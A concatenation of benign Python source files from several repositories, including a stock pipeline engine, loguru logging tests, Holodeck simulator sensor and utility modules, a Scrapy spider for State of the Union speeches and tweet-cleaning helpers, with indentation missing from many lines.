now = pd.Timestamp.now(tz=self._calendar.tz)
today = pd.Timestamp(
year=now.year, month=now.month, day=now.day,
tz='utc')
end_date = self._calendar[self._calendar.get_loc(
today, method='ffill'
)]
start_date = end_date
screen_name = uuid4().hex
graph = pipeline.to_execution_plan(screen_name,
self._root_mask_term,
self._calendar,
start_date,
end_date,
)
extra_rows = graph.extra_rows[self._root_mask_term]
root_mask = self._compute_root_mask(start_date, end_date, extra_rows)
dates, assets, root_mask_values = explode(root_mask)
initial_workspace = self._populate_initial_workspace(
{
self._root_mask_term: root_mask_values,
self._root_mask_dates_term: as_column(dates.values)
},
self._root_mask_term,
graph,
dates,
assets,
)
results = self.compute_chunk(
graph,
dates,
assets,
initial_workspace,
)
return self._to_narrow(
graph.outputs,
results,
results.pop(screen_name),
dates[extra_rows:],
assets,
)
def _compute_root_mask(self, start_date, end_date, extra_rows):
"""
Compute a lifetimes matrix from our AssetFinder, then drop columns that
didn't exist at all during the query dates.
Parameters
----------
start_date : pd.Timestamp
Base start date for the matrix.
end_date : pd.Timestamp
End date for the matrix.
extra_rows : int
Number of extra rows to compute before `start_date`.
Extra rows are needed by terms like moving averages that require a
trailing window of data.
Returns
-------
lifetimes : pd.DataFrame
Frame of dtype `bool` containing dates from `extra_rows` days
before `start_date`, continuing through to `end_date`. The
returned frame contains as columns all assets in our AssetFinder
that existed for at least one day between `start_date` and
`end_date`.
"""
calendar = self._calendar
start_idx, end_idx = calendar.slice_locs(start_date, end_date)
if start_idx < extra_rows:
raise NoFurtherDataError.from_lookback_window(
initial_message="Insufficient data to compute Pipeline:",
first_date=calendar[0],
lookback_start=start_date,
lookback_length=extra_rows,
)
# Build lifetimes matrix reaching back to `extra_rows` days before
# `start_date.`
symbols = self._list_symbols()
dates = calendar[start_idx - extra_rows:end_idx]
symbols = sorted(symbols)
lifetimes = pd.DataFrame(True, index=dates, columns=symbols)
assert lifetimes.index[extra_rows] == start_date
assert lifetimes.index[-1] == end_date
        if not lifetimes.columns.is_unique:
            columns = lifetimes.columns
            duplicated = columns[columns.duplicated()].unique()
            raise AssertionError("Duplicated sids: %s" % duplicated)
# Filter out columns that didn't exist between the requested start and
# end dates.
existed = lifetimes.iloc[extra_rows:].any()
ret = lifetimes.loc[:, existed]
shape = ret.shape
assert shape[0] * shape[1] != 0, 'root mask cannot be empty'
return ret
@staticmethod
def _inputs_for_term(term, workspace, graph):
"""
Compute inputs for the given term.
This is mostly complicated by the fact that for each input we store as
many rows as will be necessary to serve **any** computation requiring
that input.
"""
offsets = graph.offset
out = []
if term.windowed:
# If term is windowed, then all input data should be instances of
# AdjustedArray.
for input_ in term.inputs:
adjusted_array = ensure_adjusted_array(
workspace[input_], input_.missing_value,
)
out.append(
adjusted_array.traverse(
window_length=term.window_length,
offset=offsets[term, input_],
)
)
else:
# If term is not windowed, input_data may be an AdjustedArray or
# np.ndarray. Coerce the former to the latter.
for input_ in term.inputs:
input_data = ensure_ndarray(workspace[input_])
offset = offsets[term, input_]
# OPTIMIZATION: Don't make a copy by doing input_data[0:] if
# offset is zero.
if offset:
input_data = input_data[offset:]
out.append(input_data)
return out
def compute_chunk(self, graph, dates, symbols, initial_workspace):
"""
Compute the Pipeline terms in the graph for the requested start and end
dates.
Parameters
----------
graph : zipline.pipeline.graph.TermGraph
dates : pd.DatetimeIndex
Row labels for our root mask.
symbols : list
Column labels for our root mask.
initial_workspace : dict
Map from term -> output.
Must contain at least entry for `self._root_mask_term` whose shape
is `(len(dates), len(symbols))`, but may contain additional
pre-computed terms for testing or optimization purposes.
Returns
-------
results : dict
Dictionary mapping requested results to outputs.
"""
self._validate_compute_chunk_params(dates, symbols, initial_workspace)
# get_loader = self.get_loader
# Copy the supplied initial workspace so we don't mutate it in place.
workspace = initial_workspace.copy()
# If loadable terms share the same loader and extra_rows, load them all
# together.
loader_group_key = juxt(
lambda x: x.dataset.get_loader(), getitem(
graph.extra_rows))
loader_groups = groupby(loader_group_key, graph.loadable_terms)
refcounts = graph.initial_refcounts(workspace)
for term in graph.execution_order(refcounts):
# `term` may have been supplied in `initial_workspace`, and in the
# future we may pre-compute loadable terms coming from the same
# dataset. In either case, we will already have an entry for this
# term, which we shouldn't re-compute.
if term in workspace:
continue
# Asset labels are always the same, but date labels vary by how
# many extra rows are needed.
mask, mask_dates = graph.mask_and_dates_for_term(
term,
self._root_mask_term,
workspace,
dates,
)
if isinstance(term, LoadableTerm):
to_load = sorted(
loader_groups[loader_group_key(term)],
key=lambda t: t.dataset
)
loader = term.dataset.get_loader()
loaded = loader.load_adjusted_array(
to_load, mask_dates, symbols, mask,
)
workspace.update(loaded)
else:
workspace[term] = term._compute(
self._inputs_for_term(term, workspace, graph),
mask_dates,
symbols,
mask,
)
if term.ndim == 2:
assert workspace[term].shape == mask.shape
else:
assert workspace[term].shape == (mask.shape[0], 1)
# Decref dependencies of ``term``, and clear any terms whose
# refcounts hit 0.
for garbage_term in graph.decref_dependencies(term, refcounts):
del workspace[garbage_term]
out = {}
graph_extra_rows = graph.extra_rows
for name, term in iteritems(graph.outputs):
# Truncate off extra rows from outputs.
out[name] = workspace[term][graph_extra_rows[term]:]
return out
def _to_narrow(self, terms, data, mask, dates, symbols):
"""
Convert raw computed pipeline results into a DataFrame for public APIs.
Parameters
----------
terms : dict[str -> Term]
Dict mapping column names to terms.
data : dict[str -> ndarray[ndim=2]]
Dict mapping column names to computed results for those names.
mask : ndarray[bool, ndim=2]
Mask array of values to keep.
dates : ndarray[datetime64, ndim=1]
Row index for arrays `data` and `mask`
symbols : list
Column index
Returns
-------
results : pd.DataFrame
The indices of `results` are as follows:
index : two-tiered MultiIndex of (date, asset).
Contains an entry for each (date, asset) pair corresponding to
a `True` value in `mask`.
columns : Index of str
One column per entry in `data`.
If mask[date, asset] is True, then result.loc[(date, asset), colname]
will contain the value of data[colname][date, asset].
"""
assert len(dates) == 1
if not mask.any():
# Manually handle the empty DataFrame case. This is a workaround
# to pandas failing to tz_localize an empty dataframe with a
# MultiIndex. It also saves us the work of applying a known-empty
# mask to each array.
#
# Slicing `dates` here to preserve pandas metadata.
# empty_dates = dates[:0]
empty_assets = array([], dtype=object)
return DataFrame(
data={
name: array([], dtype=arr.dtype)
for name, arr in iteritems(data)
},
index=pd.Index(empty_assets),
# index=MultiIndex.from_arrays([empty_dates, empty_assets]),
)
# resolved_assets = array(self._finder.retrieve_all(assets))
# dates_kept = repeat_last_axis(dates.values, len(symbols))[mask]
# assets_kept = repeat_first_axis(resolved_assets, len(dates))[mask]
assets_kept = repeat_first_axis(symbols, len(dates))[mask]
final_columns = {}
for name in data:
# Each term that computed an output has its postprocess method
# called on the filtered result.
#
# As of Mon May 2 15:38:47 2016, we only use this to convert
# LabelArrays into categoricals.
final_columns[name] = terms[name].postprocess(data[name][mask])
return DataFrame(
data=final_columns,
index=pd.Index(assets_kept),
# index=MultiIndex.from_arrays([dates_kept, assets_kept]),
)
def _validate_compute_chunk_params(
self, dates, symbols, initial_workspace):
"""
Verify that the values passed to compute_chunk are well-formed.
"""
root = self._root_mask_term
clsname = type(self).__name__
# Writing this out explicitly so this errors in testing if we change
# the name without updating this line.
compute_chunk_name = self.compute_chunk.__name__
if root not in initial_workspace:
raise AssertionError(
"root_mask values not supplied to {cls}.{method}".format(
cls=clsname,
method=compute_chunk_name,
)
)
shape = initial_workspace[root].shape
implied_shape = len(dates), len(symbols)
if shape != implied_shape:
raise AssertionError(
"root_mask shape is {shape}, but received dates/symbols "
"imply that shape should be {implied}".format(
shape=shape,
implied=implied_shape,
)
)
```
#### File: pipeline-live/tests/test_alpaca.py
```python
import pandas as pd
import numpy as np
from .datamock import mock_tradeapi
from pipeline_live.data.alpaca.pricing import USEquityPricing
def test_pricing_loader(refdata, alpaca_tradeapi, data_path):
mock_tradeapi.list_assets(alpaca_tradeapi)
mock_tradeapi.get_barset(alpaca_tradeapi)
loader = USEquityPricing.get_loader()
columns = [USEquityPricing.close]
dates = [pd.Timestamp('2018-08-22', tz='UTC')]
symbols = ['AA']
mask = np.zeros((1, 1), dtype='bool')
out = loader.load_adjusted_array(columns, dates, symbols, mask)
assert out[USEquityPricing.close]._data.shape == (1, 1)
``` |
{
"source": "joshglenen/Rating-Recalculator",
"score": 2
} |
#### File: joshglenen/Rating-Recalculator/runApp.py
```python
import sys
from flask import Flask, render_template, json, request
import HTML_IMDB
app = Flask(__name__)
@app.route('/')
def display():
return render_template('index.html')
@app.route('/<url>', methods=['POST'])
def execute(url):
return HTML_IMDB.findID(url,0) # TODO: implement dropdown menu with index
if __name__ == '__main__':
app.run()
``` |
{
"source": "JoshGoA/scinet",
"score": 3
} |
#### File: scinet/tests/test_graph.py
```python
import unittest
from scinet import Graph
class TestGraph(unittest.TestCase):
def setUp(self):
self.G = Graph()
def test_init(self):
self.assertFalse(self.G)
def test_add_vertex(self):
for vertex in range(5):
self.G.add_vertex(vertex)
self.assertIn(vertex, self.G)
def test_add_edge(self):
for source_vertex, target_vertex, edge in zip(range(5), range(5), range(5)):
self.G.add_edge(source_vertex, target_vertex, edge)
self.assertIn(edge, self.G[source_vertex][target_vertex])
def test_remove_vertex(self):
self.test_add_vertex()
for vertex in set(self.G.vertices()):
self.G.remove_vertex(vertex)
self.assertNotIn(vertex, self.G)
def test_remove_edge(self):
self.test_add_edge()
for source_vertex, target_vertex in set(self.G.edges()):
self.G.remove_edge(source_vertex, target_vertex)
self.assertNotIn(target_vertex, self.G[source_vertex])
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "joshgordon/loguru",
"score": 3
} |
#### File: loguru/loguru/_recattrs.py
```python
from collections import namedtuple
class LevelRecattr(str):
__slots__ = ("name", "no", "icon")
class FileRecattr(str):
__slots__ = ("name", "path")
class ThreadRecattr(str):
__slots__ = ("name", "id")
class ProcessRecattr(str):
__slots__ = ("name", "id")
class ExceptionRecattr(namedtuple("ExceptionRecattr", ("type", "value", "traceback"))):
def __reduce__(self):
exception = (self.type, self.value, None) # tracebacks are not pickable
return (ExceptionRecattr, exception)
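# --- Hedged usage sketch (added; not part of the original module) ---
# Demonstrates that pickling an ExceptionRecattr drops the traceback, exactly
# as the __reduce__ above encodes it.
if __name__ == "__main__":
    import pickle
    import sys
    try:
        1 / 0
    except ZeroDivisionError:
        exc = ExceptionRecattr(*sys.exc_info())
    restored = pickle.loads(pickle.dumps(exc))
    print(restored.type.__name__, restored.traceback)  # ZeroDivisionError None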
```
#### File: source/backtrace/function.py
```python
import sys
from loguru import logger
logger.remove()
logger.add(sys.stderr, format="", colorize=False, backtrace=True, diagnose=False)
@logger.catch()
def a():
1 / 0
def b():
2 / 0
def c():
3 / 0
a()
with logger.catch():
b()
try:
c()
except ZeroDivisionError:
logger.exception("")
```
#### File: source/backtrace/missing_attributes_traceback_objects.py
```python
import sys
from loguru import logger
from collections import namedtuple
logger.remove()
logger.add(sys.stderr, format="", colorize=False, backtrace=True, diagnose=False)
a, b = 1, 0
def div(x, y):
x / y
def foo():
div(a, b)
# See Twisted: https://git.io/fjJ48
# See Billiard: https://git.io/fjJ44
fake_code = namedtuple("fake_code", ("co_filename", "co_name"))
fake_frame = namedtuple("fake_frame", ("f_back", "f_code", "f_globals", "f_lineno", "f_locals"))
fake_traceback = namedtuple("fake_traceback", ("tb_frame", "tb_lasti", "tb_lineno", "tb_next"))
def make_fake(tb):
if not tb:
return None
code = fake_code(tb.tb_frame.f_code.co_filename, tb.tb_frame.f_code.co_name)
frame = fake_frame(None, code, {}, tb.tb_lineno, {})
tb = fake_traceback(frame, tb.tb_lasti, tb.tb_lineno, make_fake(tb.tb_next))
return tb
try:
foo()
except ZeroDivisionError:
type_, value, tb = sys.exc_info()
tb = make_fake(tb)
logger.opt(exception=(type_, value, tb)).error("")
```
#### File: source/others/sys_tracebacklimit.py
```python
import sys
from loguru import logger
logger.remove()
logger.add(sys.stderr, format="", diagnose=False, backtrace=False, colorize=False)
logger.add(sys.stderr, format="", diagnose=True, backtrace=False, colorize=False)
logger.add(sys.stderr, format="", diagnose=False, backtrace=True, colorize=False)
logger.add(sys.stderr, format="", diagnose=True, backtrace=True, colorize=False)
def a():
b()
def b():
c()
def c():
d()
def d():
e()
def e():
f()
def f():
g()
def g():
h()
def h():
i()
def i():
j(1, 0)
def j(a, b):
a / b
sys.tracebacklimit = 5
try:
a()
except ZeroDivisionError:
logger.exception("")
```
#### File: loguru/tests/test_add_option_enqueue.py
```python
from loguru import logger
import time
def test_enqueue():
x = []
def sink(message):
time.sleep(0.1)
x.append(message)
logger.add(sink, format="{message}", enqueue=True)
logger.debug("Test")
assert len(x) == 0
time.sleep(0.2)
assert len(x) == 1
assert x[0] == "Test\n"
def test_enqueue_with_exception():
x = []
def sink(message):
time.sleep(0.1)
x.append(message)
logger.add(sink, format="{message}", enqueue=True)
try:
1 / 0
except ZeroDivisionError:
logger.exception("Error")
assert len(x) == 0
time.sleep(0.2)
assert len(x) == 1
lines = x[0].splitlines()
assert lines[0] == "Error"
assert lines[-1] == "ZeroDivisionError: division by zero"
```
#### File: loguru/tests/test_parse.py
```python
import pytest
import re
import pathlib
import io
from datetime import datetime
from loguru import logger
TEXT = "This\nIs\nRandom\nText\n123456789\nABC!DEF\nThis Is The End\n"
@pytest.fixture
def fileobj():
with io.StringIO(TEXT) as file:
yield file
def test_parse_file(tmpdir):
file = tmpdir.join("test.log")
file.write(TEXT)
result, *_ = list(logger.parse(str(file), r"(?P<num>\d+)"))
assert result == dict(num="123456789")
def test_parse_fileobj(tmpdir):
file = tmpdir.join("test.log")
file.write(TEXT)
result, *_ = list(logger.parse(open(str(file)), r"^(?P<t>\w+)"))
assert result == dict(t="This")
def test_parse_pathlib(tmpdir):
file = tmpdir.join("test.log")
file.write(TEXT)
result, *_ = list(logger.parse(pathlib.Path(str(file)), r"(?P<r>Random)"))
assert result == dict(r="Random")
def test_parse_string_pattern(fileobj):
result, *_ = list(logger.parse(fileobj, r"(?P<num>\d+)"))
assert result == dict(num="123456789")
def test_parse_regex_pattern(fileobj):
regex = re.compile(r"(?P<maj>[a-z]*![a-z]*)", flags=re.I)
result, *_ = list(logger.parse(fileobj, regex))
assert result == dict(maj="ABC!DEF")
def test_parse_multiline_pattern(fileobj):
result, *_ = list(logger.parse(fileobj, r"(?P<text>This[\s\S]*Text\n)"))
assert result == dict(text="This\nIs\nRandom\nText\n")
def test_parse_without_group(fileobj):
result, *_ = list(logger.parse(fileobj, r"\d+"))
assert result == {}
def test_parse_bytes():
with io.BytesIO(b"Testing bytes!") as fileobj:
result, *_ = list(logger.parse(fileobj, br"(?P<ponct>[?!:])"))
assert result == dict(ponct=b"!")
@pytest.mark.parametrize("chunk", [-1, 1, 2 ** 16])
def test_chunk(fileobj, chunk):
result, *_ = list(logger.parse(fileobj, r"(?P<a>[ABC]+)", chunk=chunk))
assert result == dict(a="ABC")
def test_positive_lookbehind_pattern():
text = "ab" * 100
pattern = r"(?<=a)(?P<b>b)"
with io.StringIO(text) as file:
result = list(logger.parse(file, pattern, chunk=9))
assert result == [dict(b="b")] * 100
def test_greedy_pattern():
text = ("\n" + "a" * 100) * 1000
pattern = r"\n(?P<a>a+)"
with io.StringIO(text) as file:
result = list(logger.parse(file, pattern, chunk=30))
assert result == [dict(a="a" * 100)] * 1000
def test_cast_dict(tmpdir):
file = tmpdir.join("test.log")
file.write("[123] [1.1] [2017-03-29 11:11:11]\n")
regex = r"\[(?P<num>.*)\] \[(?P<val>.*)\] \[(?P<date>.*)\]"
caster = dict(num=int, val=float, date=lambda d: datetime.strptime(d, "%Y-%m-%d %H:%M:%S"))
result = next(logger.parse(str(file), regex, cast=caster))
assert result == dict(num=123, val=1.1, date=datetime(2017, 3, 29, 11, 11, 11))
def test_cast_function(tmpdir):
file = tmpdir.join("test.log")
file.write("[123] [1.1] [2017-03-29 11:11:11]\n")
regex = r"\[(?P<num>.*)\] \[(?P<val>.*)\] \[(?P<date>.*)\]"
def caster(groups):
groups["num"] = int(groups["num"])
groups["val"] = float(groups["val"])
groups["date"] = datetime.strptime(groups["date"], "%Y-%m-%d %H:%M:%S")
result = next(logger.parse(str(file), regex, cast=caster))
assert result == dict(num=123, val=1.1, date=datetime(2017, 3, 29, 11, 11, 11))
def test_cast_with_irrelevant_arg(tmpdir):
file = tmpdir.join("test.log")
file.write("[123] Blabla")
regex = r"\[(?P<a>\d+)\] .*"
caster = dict(a=int, b=float)
result = next(logger.parse(str(file), regex, cast=caster))
assert result == dict(a=123)
def test_cast_with_irrelevant_value(tmpdir):
file = tmpdir.join("test.log")
file.write("[123] Blabla")
regex = r"\[(?P<a>\d+)\] (?P<b>.*)"
caster = dict(a=int)
result = next(logger.parse(str(file), regex, cast=caster))
assert result == dict(a=123, b="Blabla")
@pytest.mark.parametrize("file", [object(), 123, dict])
def test_invalid_file(file):
with pytest.raises(ValueError):
next(logger.parse(file, r"pattern"))
@pytest.mark.parametrize("pattern", [object(), 123, dict])
def test_invalid_pattern(fileobj, pattern):
with pytest.raises(ValueError):
next(logger.parse(fileobj, pattern))
@pytest.mark.parametrize("cast", [object(), 123])
def test_invalid_cast(fileobj, cast):
with pytest.raises(ValueError):
next(logger.parse(fileobj, r"pattern", cast=cast))
``` |
{
"source": "joshgoshbgosh/ccs-final-project",
"score": 3
} |
#### File: ccs-final-project/accounts/models.py
```python
from django.db import models
from django.conf import settings
from django.contrib.auth.models import AbstractUser
class User(AbstractUser):
username = models.CharField(max_length=255)
class Profile(models.Model):
# https://docs.djangoproject.com/en/3.1/topics/db/examples/one_to_one/#one-to-one-relationships
user = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name="profile", blank=True)
phone_number = models.CharField(max_length=12, blank=True)
def __str__(self):
return self.user.username
``` |
{
"source": "joshgreaves/Holodeck",
"score": 2
} |
#### File: Holodeck/holodeck/exceptions.py
```python
class HolodeckException(Exception):
"""HolodeckException.
Args:
message (str): The error string.
"""
def __init__(self, message):
super(HolodeckException, self).__init__(message)
```
#### File: Holodeck/holodeck/hyperparameters.py
```python
from holodeck.agents import *
class Hyperparameters:
"""This class contains an easy way of accessing the expected size of the hyperparameter array for an agent."""
_shape_dict = {
UavAgent: [27]
}
@staticmethod
def shape(agent_type):
"""Get the shape of the hyperparameter array for the specified agent"""
return Hyperparameters._shape_dict[agent_type] if agent_type in Hyperparameters._shape_dict else [1]
class UAVHyperparameters:
"""This class contains the indices of the UAV's hyperparameters
The variables appended with a P, I, or D apply to the proportional, integral, and derivative part of the internal
PID controller of the UAV. The variables with TAU are the "Process Time Constants" - the value that we calculated
(admittedly imperfectly) to be the amount of time (in seconds) for the UAV to reach 63.2% of its output in the
respective aspect. Changing Tau will cause overshooting the target or arriving late to the target, depending.
"""
NUMBER_OF_ELEMENTS = 0 # this is the first item in the buffer, not the actual number of elements
UAV_MASS = 1
UAV_MU = 2
UAV_MAX_ROLL = 3
UAV_MAX_PITCH = 4
UAV_MAX_YAW_RATE = 5
UAV_MAX_FORCE = 6
UAV_TAU_UP_ROLL = 7
UAV_TAU_UP_PITCH = 8
UAV_TAU_UP_YAW_RATE = 9
UAV_TAU_UP_FORCE = 10
UAV_TAU_DOWN_ROLL = 11
UAV_TAU_DOWN_PITCH = 12
UAV_TAU_DOWN_YAW_RATE = 13
UAV_TAU_DOWN_FORCE = 14
UAV_ROLL_P = 15
UAV_ROLL_I = 16
UAV_ROLL_D = 17
UAV_PITCH_P = 18
UAV_PITCH_I = 19
UAV_PITCH_D = 20
UAV_YAW_P = 21
UAV_YAW_I = 22
UAV_YAW_D = 23
UAV_ALT_P = 24
UAV_ALT_I = 25
UAV_ALT_D = 26
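# --- Hedged usage sketch (added; not part of the original file) ---
# Shows how the index constants above address entries in a flat hyperparameter
# buffer of the shape reported by Hyperparameters.shape(). The numeric values
# written below are placeholders, not tuned UAV parameters.
if __name__ == "__main__":
    import numpy as np
    params = np.zeros(Hyperparameters.shape(UavAgent), dtype=np.float32)
    params[UAVHyperparameters.NUMBER_OF_ELEMENTS] = params.size
    params[UAVHyperparameters.UAV_MASS] = 3.85      # placeholder mass
    params[UAVHyperparameters.UAV_MAX_ROLL] = 0.5   # placeholder max roll
    print(params.shape, params[UAVHyperparameters.UAV_MASS])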
```
#### File: Holodeck/holodeck/sensors.py
```python
import numpy as np
class Sensors:
    """Holds sensor metadata, with mappings from sensor names to their corresponding index numbers
Attributes:
TERMINAL (int): Index for terminal sensor output. Value is 1.
REWARD (int): Index for reward sensor output. Value is 2.
PRIMARY_PLAYER_CAMERA (int): Deprecated. Index for primary player camera sensor. Value is 3.
PIXEL_CAMERA (int): Index for pixel camera sensor. Value is 4.
ORIENTATION_SENSOR (int): Index for orientation sensor. Value is 5.
IMU_SENSOR (int): Index for IMU sensor. Value is 6.
JOINT_ROTATION_SENSOR (int): Index for joint rotation sensor. Value is 7.
RELATIVE_SKELETAL_POSITION_SENSOR (int): Index for relative skeletal position sensor. Value is 8.
LOCATION_SENSOR (int): Index for location sensor. Value is 9.
VELOCITY_SENSOR (int): Index for velocity sensor. Value is 10.
ROTATION_SENSOR (int): Index for rotation sensor. Value is 11.
COLLISION_SENSOR (int): Index for collision sensor. Value is 12.
PRESSURE_SENSOR (int): Index for pressure sensor. Value is 13.
"""
TERMINAL = 1
REWARD = 2
PRIMARY_PLAYER_CAMERA = 3 # default is 512 x 512 RGBA
PIXEL_CAMERA = 4 # default is 512 x 512 RGBA
ORIENTATION_SENSOR = 5
IMU_SENSOR = 6
JOINT_ROTATION_SENSOR = 7
RELATIVE_SKELETAL_POSITION_SENSOR = 8
LOCATION_SENSOR = 9
VELOCITY_SENSOR = 10
ROTATION_SENSOR = 11
COLLISION_SENSOR = 12
PRESSURE_SENSOR = 13
# Sizes are the number of entries in the numpy array
_shape_dict = {
TERMINAL: [1],
REWARD: [1],
PRIMARY_PLAYER_CAMERA: [512, 512, 4],
PIXEL_CAMERA: [256, 256, 4],
ORIENTATION_SENSOR: [3, 3],
IMU_SENSOR: [2, 3],
JOINT_ROTATION_SENSOR: [94],
RELATIVE_SKELETAL_POSITION_SENSOR: [67, 4],
LOCATION_SENSOR: [3],
VELOCITY_SENSOR: [3],
ROTATION_SENSOR: [3],
COLLISION_SENSOR: [1],
PRESSURE_SENSOR: [48*(3+1)],
}
_type_dict = {
TERMINAL: np.bool,
REWARD: np.float32,
PRIMARY_PLAYER_CAMERA: np.uint8,
PIXEL_CAMERA: np.uint8,
ORIENTATION_SENSOR: np.float32,
IMU_SENSOR: np.float32,
JOINT_ROTATION_SENSOR: np.float32,
RELATIVE_SKELETAL_POSITION_SENSOR: np.float32,
LOCATION_SENSOR: np.float32,
VELOCITY_SENSOR: np.float32,
ROTATION_SENSOR: np.float32,
COLLISION_SENSOR: np.bool,
PRESSURE_SENSOR: np.float32,
}
_name_dict = {
TERMINAL: "Terminal",
REWARD: "Reward",
PRIMARY_PLAYER_CAMERA: "PrimaryPlayerCamera",
PIXEL_CAMERA: "PixelCamera",
ORIENTATION_SENSOR: "OrientationSensor",
IMU_SENSOR: "IMUSensor",
JOINT_ROTATION_SENSOR: "JointRotationSensor",
RELATIVE_SKELETAL_POSITION_SENSOR: "RelativeSkeletalPositionSensor",
LOCATION_SENSOR: "LocationSensor",
VELOCITY_SENSOR: "VelocitySensor",
ROTATION_SENSOR: "RotationSensor",
COLLISION_SENSOR: "CollisionSensor",
PRESSURE_SENSOR: "PressureSensor"
}
_reverse_name_dict = {v: k for k, v in _name_dict.items()}
@staticmethod
def shape(sensor_type):
"""Gets the shape of a particular sensor.
Args:
sensor_type (int): The type of the sensor.
Returns:
List of int: The shape of the sensor data.
"""
return Sensors._shape_dict[sensor_type] if sensor_type in Sensors._shape_dict else None
@staticmethod
def name(sensor_type):
"""Gets the human readable name for a sensor.
Args:
sensor_type (int): The type of the sensor.
Returns:
str: The name of the sensor.
"""
return Sensors._name_dict[sensor_type] if sensor_type in Sensors._name_dict else None
@staticmethod
def dtype(sensor_type):
"""Gets the data type of the sensor data (the dtype of the numpy array).
Args:
sensor_type (int): The type of the sensor.
Returns:
type: The type of the sensor data.
"""
return Sensors._type_dict[sensor_type] if sensor_type in Sensors._type_dict else None
@staticmethod
def name_to_sensor(sensor_name):
"""Gets the index value of a sensor from its human readable name.
Args:
sensor_name (str): The human readable name of the sensor.
Returns:
int: The index value for the sensor.
"""
return Sensors._reverse_name_dict[sensor_name] if sensor_name in Sensors._reverse_name_dict else None
@staticmethod
def set_primary_cam_size(height, width):
"""Sets the primary camera size for this world. Should only be called by environment.
Args:
height (int): New height value.
width (int): New width value.
"""
Sensors._shape_dict[Sensors.PRIMARY_PLAYER_CAMERA] = [height, width, 4]
@staticmethod
def set_pixel_cam_size(height, width):
"""Sets the pixel camera size for this world. Should only be called by Environment.
Args:
height (int): New height value.
width (int): New width value.
"""
Sensors._shape_dict[Sensors.PIXEL_CAMERA] = [height, width, 4]
def __init__(self):
print("No point in instantiating an object.")
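# --- Hedged usage sketch (added; not part of the original file) ---
# The static helpers above are plain table lookups; these calls just echo the
# dictionaries defined in the class.
if __name__ == "__main__":
    print(Sensors.name(Sensors.LOCATION_SENSOR))     # "LocationSensor"
    print(Sensors.shape(Sensors.PIXEL_CAMERA))       # [256, 256, 4] by default
    print(Sensors.dtype(Sensors.IMU_SENSOR))         # numpy float32
    print(Sensors.name_to_sensor("PressureSensor"))  # 13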
```
#### File: Holodeck/holodeck/util.py
```python
import math
import os
try:
unicode # Python 2
except NameError:
unicode = str # Python 3
def get_holodeck_path():
"""Gets the path of the holodeck environment
Returns:
(str): path to the current holodeck environment
"""
if "HOLODECKPATH" in os.environ and os.environ["HOLODECKPATH"] != "":
return os.environ["HOLODECKPATH"]
if os.name == "posix":
return os.path.expanduser("~/.local/share/holodeck")
elif os.name == "nt":
return os.path.expanduser("~\\AppData\\Local\\holodeck")
else:
raise NotImplementedError("holodeck is only supported for Linux and Windows")
def convert_unicode(value):
"""Resolves python 2 issue with json loading in unicode instead of string
Args:
value (str): Unicode value to be converted
Returns:
(str): converted string
"""
if isinstance(value, dict):
        return {convert_unicode(key): convert_unicode(val)
                for key, val in value.items()}
elif isinstance(value, list):
return [convert_unicode(item) for item in value]
elif isinstance(value, unicode):
return value.encode('utf-8')
else:
return value
def get_os_key():
"""Gets the key for the OS.
Returns:
str: "Linux" or "Windows". Throws NotImplementedError for other systems.
"""
if os.name == "posix":
return "Linux"
elif os.name == "nt":
return "Windows"
else:
raise NotImplementedError("holodeck is only supported for Linux and Windows")
def human_readable_size(size_bytes):
"""Gets a number of bytes as a human readable string.
Args:
size_bytes (int): The number of bytes to get as human readable.
Returns:
str: The number of bytes in a human readable form.
"""
if size_bytes == 0:
return "0B"
size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
i = int(math.floor(math.log(size_bytes, 1024)))
p = math.pow(1024, i)
s = round(size_bytes / p, 2)
return "%s %s" % (s, size_name[i])
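# --- Hedged usage sketch (added; not part of the original file) ---
# Quick check of human_readable_size against a few byte counts.
if __name__ == "__main__":
    for n_bytes in (0, 1023, 2048, 5 * 1024 ** 3):
        print(n_bytes, "->", human_readable_size(n_bytes))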
``` |
{
"source": "josh-gree/conf_speeches",
"score": 3
} |
#### File: SOU/spiders/SOU_spider.py
```python
import scrapy
from SOU.items import SouItem
from bs4 import BeautifulSoup
class SOUSpider(scrapy.Spider):
name = "souspider"
allowed_domains = ["stateoftheunion.onetwothree.net"]
start_urls = ("http://stateoftheunion.onetwothree.net/texts/index.html",)
def parse(self, response):
links = map(response.urljoin,response.css('a::attr(href)')[5:-2].extract())
for link in links:
yield scrapy.Request(link,callback=self.extract_speech)
def extract_speech(self,response):
text = ''.join(response.css('p').extract())
        text = BeautifulSoup(text, "html.parser").text.replace("\n", " ")
speaker = response.css('h2::text').extract()[0]
date = int(response.css('h3::text').extract()[0].split()[-1])
item = SouItem()
item['text'] = text
item['speaker'] = speaker
item['date'] = date
yield item
``` |
{
"source": "josh-gree/debatesnlp",
"score": 3
} |
#### File: src/data/helper_functions.py
```python
from itertools import islice
from numpy import array, nan
import pandas as pd
from tempfile import NamedTemporaryFile
import preprocessor as p
import re
import subprocess
def try_extract(d,field):
try:
return d[field]
except Exception:
return None
def chunker(iterable, n):
iterable = iter(iterable)
count = 0
group = []
while True:
try:
            group.append(next(iterable))
count += 1
if count % n == 0:
yield group
group = []
except StopIteration:
yield group
break
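# --- Hedged usage sketch (added; not part of the original module) ---
# chunker yields lists of n items followed by a final, possibly shorter,
# remainder group.
if __name__ == '__main__':
    assert list(chunker(range(5), 2)) == [[0, 1], [2, 3], [4]]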
def extract_name(d):
if d[3] != None:
return d[3]['full_name']
else:
return None
def extract_centroid(d):
if d[3] != None:
return array(d[3]['bounding_box']['coordinates']).mean(axis=1)[0]
else:
return None
def make_df(data_chunk,i,base_fname):
fname = '../../data/processed/{}_{}.csv'.format(base_fname,i)
coords = [extract_centroid(d) for d in data_chunk]
place_names = [extract_name(d) for d in data_chunk]
tweets = [d[0] for d in data_chunk]
dates = [pd.to_datetime(int(d[1])*1000000) for d in data_chunk]
data_chunk = {'coord':coords,'place_name':place_names,'tweet':tweets,'date':dates}
df = pd.DataFrame(data_chunk)
df = df.drop_duplicates(subset=['tweet'])
df = df.fillna(value=nan)
df['long'] = df.iloc[:,0].map(lambda x : x[0],na_action='ignore')
df['lat'] = df.iloc[:,0].map(lambda x : x[1],na_action='ignore')
df = df.drop('coord',axis=1)
regex = re.compile('[\.\t\,\:;\(\)\.\?\*\%\'\!\+\"]')
    # Build from the existing 'tweet' column via a local Series; attribute-style
    # assignment on a DataFrame does not create a new column.
    encoded_tweets = df.tweet.map(lambda x: x.encode('utf-8').strip())
    df['cleaned_tweet'] = encoded_tweets.map(p.clean)
